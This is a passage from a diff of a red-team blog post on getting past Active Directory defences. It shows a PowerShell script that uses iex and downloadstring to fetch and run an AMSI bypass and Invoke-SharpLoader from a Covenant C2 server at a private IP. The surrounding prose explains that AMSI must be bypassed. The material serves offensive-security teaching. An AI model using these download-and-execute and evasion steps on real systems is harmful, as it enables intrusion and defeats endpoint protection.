LuemmelSec/LuemmelSec.github.io/_posts/2021-01-16-Circumventing-Countermeasures-In-AD.md

     And host this file as well on our Covenant server under i.e. /Invoke-SharpLoader

 4. Execute our Powershell load script

     In the last step we put together a short script that we can call from our PowerShdll which looks like this:
     ```
     iex(new-object net.webclient).downloadstring('http://10.55.0.30/amsibypass');
     iex(new-object net.webclient).downloadstring('http://10.55.0.30/Invoke-SharpLoader');
     ```
     Remeber AMSI is still in place here, so we need to bypass it - even inside PowerShdll.
-Luckily for us, Invoke-Sharploader has a integrated C# and ETW bypass, so we just take care for the normal PowerShell AMSI bypass.
+Luckily for us, Invoke-Sharploader has a integrated C# and ETW bypass, so we just take care for the normal PowerShell AMSI bypass beforehand.

     Upload to our Covenant server under /init.